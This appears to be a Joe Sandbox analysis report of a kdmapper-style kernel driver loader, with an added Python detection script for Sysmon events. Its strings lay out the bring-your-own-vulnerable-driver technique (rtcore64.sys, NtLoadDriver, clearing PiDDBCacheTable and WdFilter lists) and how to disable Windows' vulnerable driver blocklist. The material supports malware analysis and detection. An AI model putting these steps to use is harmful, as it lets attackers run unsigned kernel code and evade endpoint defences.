6390->6259 6393 7ff7cc41c660 DeviceIoControl 6391->6393 6395 7ff7cc41c6dc 6391->6395 6394 7ff7cc41c5ee ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6392->6394 6393->6384 6393->6391 6394->6384 6396 7ff7cc415ef0 9 API calls 6395->6396 6397 7ff7cc41c6f0 6396->6397 6397->6384 6398 7ff7cc41c720 DeviceIoControl 6397->6398 6398->6384 6398->6397 6401 7ff7cc416428 6400->6401 6402 7ff7cc416332 6400->6402 6401->5978 6403 7ff7cc4163f9 6402->6403 6406 7ff7cc424090 3 API calls 6402->6406 6404 7ff7cc416430 6403->6404 6405 7ff7cc416405 6403->6405 6410 7ff7cc41aa68 GetModuleHandleA 6404->6410 6411 7ff7cc41aa9d 
Control-flow graph edge list (continuation of the previous function's graph, which the original page renders as an image). Recoverable content: a GetModuleHandleA → GetProcAddress → DeviceIoControl loop at 7ff7cc41aa68..7ff7cc41abb0, with an error print through basic_ostream on the failure edge; a second DeviceIoControl loop at 7ff7cc4159d0; a process enumeration at 7ff7cc421507 (memset, Process32FirstW, Process32NextW, CloseHandle); WideCharToMultiByte with GetLastError checks at 7ff7cc423a94; string-conversion helpers at 7ff7cc422430..7ff7cc422590 (memset, memmove, free); and CRT/STL runtime edges (_invalid_parameter_noinfo_noreturn, _CxxThrowException, _Xlength_error, ?_Syserror_map, std::_Facet_Register, Concurrency::cancel_current_task, __std_exception_copy/__std_exception_destroy, __std_fs_code_page, basic_streambuf sgetc/sbumpc/xsputn, fwrite, AcquireSRWLockExclusive/ReleaseSRWLockExclusive/WakeAllConditionVariable, __GSHandlerCheckCommon/__CxxFrameHandler4/__C_specific_handler, IsProcessorFeaturePresent, RtlCaptureContext/RtlLookupFunctionEntry/RtlVirtualUnwind feeding SetUnhandledExceptionFilter/UnhandledExceptionFilter/GetCurrentProcess/TerminateProcess).

                                                                                          Control-flow Graph
                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Graph rendered as an image on the original page. Recoverable call sequence for the function at 7ff7cc4145e0: LoadLibraryA ×2 and _dupenv_s at entry; subcalls 7ff7cc41c9f0, 7ff7cc41a0f0, 7ff7cc419af0, 7ff7cc413bb0 and 7ff7cc413ce0; SymFromName at 7ff7cc41479c, whose failure branch prints through basic_ostream and falls through to the SymUnloadModule64 / SymCleanup / CloseHandle ×2 cleanup at 7ff7cc414ed8; _time64, GetCurrentThreadId, srand and a rand loop at 7ff7cc4148d2..7ff7cc414998; _wremove, memset and basic_ostream::write at 7ff7cc414a66 with ios_base::operator! and setstate checks; subcall 7ff7cc422900 at 7ff7cc414b50 followed by either _wremove (failure path) or CreateFileW at 7ff7cc414ba5; a DeviceIoControl loop at 7ff7cc414d60; four successive subcalls 7ff7cc4172b0, 7ff7cc417ea0, 7ff7cc416810 and 7ff7cc415010, each with a failure edge to the error-print block at 7ff7cc414e59; then the cleanup block. Error paths throughout go through _invalid_parameter_noinfo_noreturn and free (7ff7cc423fe0).
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@_invalid_parameter_noinfo_noreturn$??6?$basic_ostream@V01@@$Virtual$?setstate@?$basic_ios@CloseFreeHandleInformationLibraryLoadQuerySystem_wremovememmoverand$??7ios_base@std@@?write@?$basic_ostream@AllocCleanupControlCreateCurrentDeviceFileFromModule64NameThreadUnloadV12@_dupenv_s_time64freememsetsrand
                                                                                          • String ID: 0$NtUserSetGestureConfig$[!] Failed to ClearMmUnloadedDrivers$[!] Failed to ClearWdFilterDriverList$[-] Can't find TEMP folder$[-] Failed to ClearKernelHashBucketList$[-] Failed to ClearPiDDBCacheTable$[-] Failed to Load PDB$[-] Failed to Load Symbol of NtUserSetGestureConfig$[-] Failed to create vulnerable driver file$[-] Failed to get ntoskrnl.exe$[-] Failed to get temp path$[-] Failed to load driver rtcore64.sys$[-] Failed to register and start service for the vulnerable driver$[-] NtUserSetGestureConfig not found$[-] win32k.sys not found$[<] Loading vulnerable driver, Name: $\System32\win32k.sys$\\.\RTCore64$gfff$https://msdl.microsoft.com/download/symbols$nULoYBmSWb$ntoskrnl.exe$systemroot$user32.dll$win32k.sys$win32u.dll$xxx
                                                                                          • API String ID: 4261666574-3734435960
                                                                                          • Opcode ID: bce5c08c5481cec9c782fb4ba2241304df26073b218856d8ec388f28b70f6ba3
                                                                                          • Instruction ID: 0e9c034be297c01c8b12e6b2cc433da1901d173cfe0582f06626fc18aabc6538
                                                                                          • Opcode Fuzzy Hash: bce5c08c5481cec9c782fb4ba2241304df26073b218856d8ec388f28b70f6ba3
                                                                                          • Instruction Fuzzy Hash: 71529562E187C285EA10EF24E8413BDAB61FF857BCF909231D99D46A95DF7CE284C310
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7CC421673
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC4216CB
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42170B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42179B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC4217DB
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42184B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42188B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42190B
                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42194B
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC4219A4
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC4219CC
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC4219F3
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC421A1B
                                                                                            • Part of subcall function 00007FF7CC421390: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC421406
                                                                                            • Part of subcall function 00007FF7CC421390: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7CC42143D
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC421A42
                                                                                          • memcmp.VCRUNTIME140(?), ref: 00007FF7CC421C18
                                                                                          • __std_fs_code_page.MSVCPRT ref: 00007FF7CC421BCC
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC421D58
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC421D7B
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7CC421DB3
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7CC421DBA
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7CC421DC1
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7CC421F17
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC421F7A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC4220A0
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC422168
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7CC422190
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC4221C4
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC42220B
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                            • Part of subcall function 00007FF7CC423080: memset.VCRUNTIME140 ref: 00007FF7CC4230C1
                                                                                            • Part of subcall function 00007FF7CC423080: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4230E0
                                                                                            • Part of subcall function 00007FF7CC423080: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC4230FF
                                                                                            • Part of subcall function 00007FF7CC423080: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC423133
                                                                                            • Part of subcall function 00007FF7CC423080: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC423152
                                                                                            • Part of subcall function 00007FF7CC423080: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC42319B
                                                                                            • Part of subcall function 00007FF7CC423080: ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC4231D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@@$_wcsicmp$_invalid_parameter_noinfo_noreturn$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?setstate@?$basic_ios@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??7ios_base@std@@?flush@?$basic_ostream@_?sputc@?$basic_streambuf@_?uncaught_exception@std@@D@std@@@1@_ExceptionFilterInit@?$basic_streambuf@Osfx@?$basic_ostream@_UnhandledV12@V?$basic_streambuf@__std_fs_code_pagemallocmemcmpmemset
                                                                                          • String ID: [!] Incorrect Usage!$ doesn't exist$.sys$PassAllocationPtr$[+] Allocate Independent Pages mode enabled$[+] Clean Valnerable Driver enabled$[+] Free pool memory after usage enabled$[+] Mdl memory usage enabled$[+] Pass Allocation Ptr as first param enabled$[+] Usage: kdmapper.exe [--free][--mdl][--PassAllocationPtr] driver$[+] success$[-] Failed to map $[-] Failed to read image to memory$[-] File $[-] Too many allocation modes$[-] Warning failed to fully unload vulnerable driver $clean$free$indPages$mdl
                                                                                          • API String ID: 3202131322-1332891958
                                                                                          • Opcode ID: 16d2ccc80ab2a97235b05bf546b41234f32b28a7870f0edaabc0c6fcd086e44e
                                                                                          • Instruction ID: ddb21f35e806f7d6fbbccd7d676489561ff589e0d05390dcbaae590faf7f9f32
                                                                                          • Opcode Fuzzy Hash: 16d2ccc80ab2a97235b05bf546b41234f32b28a7870f0edaabc0c6fcd086e44e
                                                                                          • Instruction Fuzzy Hash: DF728662E186C285EB10AF25D8422B8AB61FF457B8FD0D231D95D836D5DF7CEA84C360
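                                                                                          Analyst note on the two function entries above. Their string sets and API lists describe a kdmapper-style loader: it writes a vulnerable driver (rtcore64.sys, opened later as \\.\RTCore64) into the TEMP folder after a rand loop, registers it as a kernel service through the registry (RegCreateKeyW / RegSetKeyValueW in the function at 7ff7cc422900), loads it with NtLoadDriver after RtlAdjustPrivilege, resolves ntoskrnl.exe and win32k.sys offsets by pulling symbols from https://msdl.microsoft.com/download/symbols, and then clears PiDDBCacheTable, KernelHashBucketList, MmUnloadedDrivers and the WdFilter driver list before deleting the file (_wremove). Because the on-disk driver is removed and its name is not fixed, detection has to rest on the event trail rather than on file presence. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: it applies that reasoning to constructed Sysmon-style records (RegistryEvent SetValue, DriverLoad, DnsQuery). Field names follow Sysmon's schema; the service and file names, process GUIDs, the C:\Windows SystemRoot and the symbol-client allowlist are assumptions.

```python
"""Hunt for the loader pattern this report shows: a kernel service registered through the
registry with an ImagePath in a user-writable temp directory, loaded via NtLoadDriver, from a
process that also fetches PDBs from msdl.microsoft.com. Events below are CONSTRUCTED in Sysmon's
field layout (EventID 13 = RegistryEvent SetValue, 6 = DriverLoad, 22 = DnsQuery); not from the run."""
import re
from collections import defaultdict

# Driver name seen in this report; loaders usually drop the file under a random name, so this is secondary.
KNOWN_VULNERABLE_DRIVER_NAMES = {"rtcore64.sys"}
SYMBOL_SERVERS = {"msdl.microsoft.com"}
# Assumption: processes expected to fetch symbols on the monitored hosts; tune per environment.
SYMBOL_CLIENT_ALLOWLIST = {"windbg.exe", "windbgx.exe", "devenv.exe", "procexp64.exe"}
USER_WRITABLE = re.compile(r"^[a-z]:\\(users\\[^\\]+\\appdata\\local\\temp|windows\\temp)\\", re.I)
SERVICE_IMAGEPATH = re.compile(r"\\services\\[^\\]+\\imagepath$", re.I)

def normalize_nt_path(path):
    """Strip the object-manager prefixes ImagePath values carry (\\??\\ and \\SystemRoot\\)."""
    path = path.strip().strip('"')
    low = path.lower()
    if low.startswith("\\??\\"):
        return path[4:]
    if low.startswith("\\systemroot\\"):
        # Assumption: SystemRoot is C:\Windows on the monitored hosts.
        return "C:\\Windows\\" + path[len("\\systemroot\\"):]
    return path

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Rules a single event trips; an empty list means the event looks benign."""
    hits = []
    path = None
    if ev["EventID"] == 13 and SERVICE_IMAGEPATH.search(ev["TargetObject"]):
        path = normalize_nt_path(ev["Details"])
        if path.lower().endswith(".sys") and USER_WRITABLE.match(path):
            hits.append("kernel_service_imagepath_in_user_writable_dir")
    elif ev["EventID"] == 6:
        path = normalize_nt_path(ev["ImageLoaded"])
        if USER_WRITABLE.match(path):
            hits.append("driver_loaded_from_user_writable_dir")
    elif ev["EventID"] == 22 and ev["QueryName"].lower() in SYMBOL_SERVERS:
        if basename(ev["Image"]) not in SYMBOL_CLIENT_ALLOWLIST:
            hits.append("symbol_server_query_from_unexpected_process")
    if path and basename(path) in KNOWN_VULNERABLE_DRIVER_NAMES:
        hits.append("known_vulnerable_driver_name")
    return hits

def correlate(events):
    """Group hits per process. Sysmon DriverLoad records carry no ProcessGuid, so a driver
    load is attributed to the process that earlier wrote that path into a service ImagePath."""
    imagepath_owner = {}  # normalized driver path -> ProcessGuid that wrote ImagePath
    findings = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 13 and SERVICE_IMAGEPATH.search(ev["TargetObject"]):
            imagepath_owner[normalize_nt_path(ev["Details"]).lower()] = ev["ProcessGuid"]
        hits = check_event(ev)
        if not hits:
            continue
        if ev["EventID"] == 6:
            key = normalize_nt_path(ev["ImageLoaded"]).lower()
            owner = imagepath_owner.get(key, "<unattributed driver load>")
        else:
            owner = ev["ProcessGuid"]
        findings[owner].update(hits)
    result = {}
    for owner, rules in findings.items():
        # Registration plus an actual load from a user-writable path is the complete chain.
        full_chain = {"kernel_service_imagepath_in_user_writable_dir",
                      "driver_loaded_from_user_writable_dir"} <= rules
        result[owner] = {"rules": sorted(rules),
                         "severity": "high" if full_chain else "medium"}
    return result

SAMPLE_EVENTS = [  # constructed records; the .sys name is random, as this loader does
    {"EventID": 13, "ProcessGuid": "{LOADER-1}", "Image": "C:\\Users\\u\\Desktop\\lUAc7lqa56.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\qJxKpLmRzV\\ImagePath",
     "Details": "\\??\\C:\\Users\\u\\AppData\\Local\\Temp\\qJxKpLmRzV.sys"},
    {"EventID": 22, "ProcessGuid": "{LOADER-1}", "Image": "C:\\Users\\u\\Desktop\\lUAc7lqa56.exe",
     "QueryName": "msdl.microsoft.com"},
    {"EventID": 6, "ImageLoaded": "C:\\Users\\u\\AppData\\Local\\Temp\\qJxKpLmRzV.sys"},
    # A second loader that kept the driver's real name.
    {"EventID": 13, "ProcessGuid": "{LOADER-2}", "Image": "C:\\Windows\\Temp\\drop.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\RTCore64\\ImagePath",
     "Details": "\\??\\C:\\Windows\\Temp\\RTCore64.sys"},
    # Benign noise: a normal driver service and a real debugger fetching symbols.
    {"EventID": 13, "ProcessGuid": "{SERVICES}", "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\ImagePath",
     "Details": "\\SystemRoot\\System32\\drivers\\mssmbios.sys"},
    {"EventID": 6, "ImageLoaded": "C:\\Windows\\System32\\drivers\\mssmbios.sys"},
    {"EventID": 22, "ProcessGuid": "{WINDBG}", "Image": "C:\\Program Files\\WinDbg\\windbg.exe",
     "QueryName": "msdl.microsoft.com"},
]

if __name__ == "__main__":
    for owner, finding in correlate(SAMPLE_EVENTS).items():
        print(owner, finding["severity"], ", ".join(finding["rules"]))
```

Run as a script it prints one line per suspicious process; in production feed it real Sysmon 13/6/22 records (System log 7045 service-install events are a further source for the registration step). The path normaliser matters because ImagePath values written through the registry API commonly carry the NT \??\ prefix, and the DriverLoad correlation by path is needed because Sysmon does not attach a ProcessGuid to driver loads. The symbol-server rule is the weakest of the three and is deliberately scored only as part of a chain.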

                                                                                          Control-flow Graph
                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Graph rendered as an image on the original page. Recoverable call sequence for the function at 7ff7cc422900: subcall 7ff7cc4140c0 (failure edge to 7ff7cc411230, the _Xlength_error path); subcall 7ff7cc41d270 twice; RegCreateKeyW at 7ff7cc4229a6; RegSetKeyValueW at 7ff7cc4229f6 and again at 7ff7cc422aa8, each failure branch doing RegCloseKey and printing through basic_ostream via 7ff7cc41a7c0; RegCloseKey and GetModuleHandleA at 7ff7cc422aeb; GetProcAddress ×2 and RtlAdjustPrivilege at 7ff7cc422b0a; RtlInitUnicodeString and NtLoadDriver at 7ff7cc422b60, with the returned status written to a wide ostream on both the success and failure branches; free (7ff7cc423fe0) and _invalid_parameter_noinfo_noreturn on the teardown paths.
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@_invalid_parameter_noinfo_noreturn$Close$??6?$basic_ostream@_AddressProcU?$char_traits@_ValueW@std@@@std@@memmove$AdjustCreateDriverHandleInitLoadModulePrivilegeStringUnicodeV21@@Vios_base@1@
                                                                                          • String ID: 4$Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator.$ImagePath$NtLoadDriver$RtlAdjustPrivilege$SYSTEM\CurrentControlSet\Services\$Type$[+] NtLoadDriver Status 0x$[-] Can't create 'ImagePath' registry value$[-] Can't create 'Type' registry value$[-] Can't create service key$[-] Registry path to disable vulnerable driver list: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CI\Config$[-] Set 'VulnerableDriverBlocklistEnable' as dword to 0$[-] Your vulnerable driver list is enabled and have blocked the driver loading, you must disable vulnerable driver list to use kdmapper with intel driver$\??\$\Registry\Machine\System\CurrentControlSet\Services\$ntdll.dll
                                                                                          • API String ID: 1880033537-3754729842

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleModuleProcess$AttributesCleanupCurrentDirectoryErrorInitializeLastLoadNameOpenOptionsPathRemoveSpec_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: %02x$.pdb$<$RSDS$d$symbols\
                                                                                          • API String ID: 3470403176-2640848996

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32memset
                                                                                          • String ID:
                                                                                          • API String ID: 2672634495-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: freemallocmemmovememset
                                                                                          • String ID:
                                                                                          • API String ID: 1050734653-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC411B68
                                                                                            • Part of subcall function 00007FF7CC419790: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4197CC
                                                                                            • Part of subcall function 00007FF7CC419790: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC4197EB
                                                                                            • Part of subcall function 00007FF7CC419790: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC41981D
                                                                                            • Part of subcall function 00007FF7CC419790: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC419838
                                                                                            • Part of subcall function 00007FF7CC419790: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC419883
                                                                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF7CC411B8F
                                                                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF7CC411BA9
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC411C2B
                                                                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF7CC411C4A
                                                                                          • ??Bios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC411C5D
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC411CCA
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC411D25
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC411D77
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC411E0E
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC411E07
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
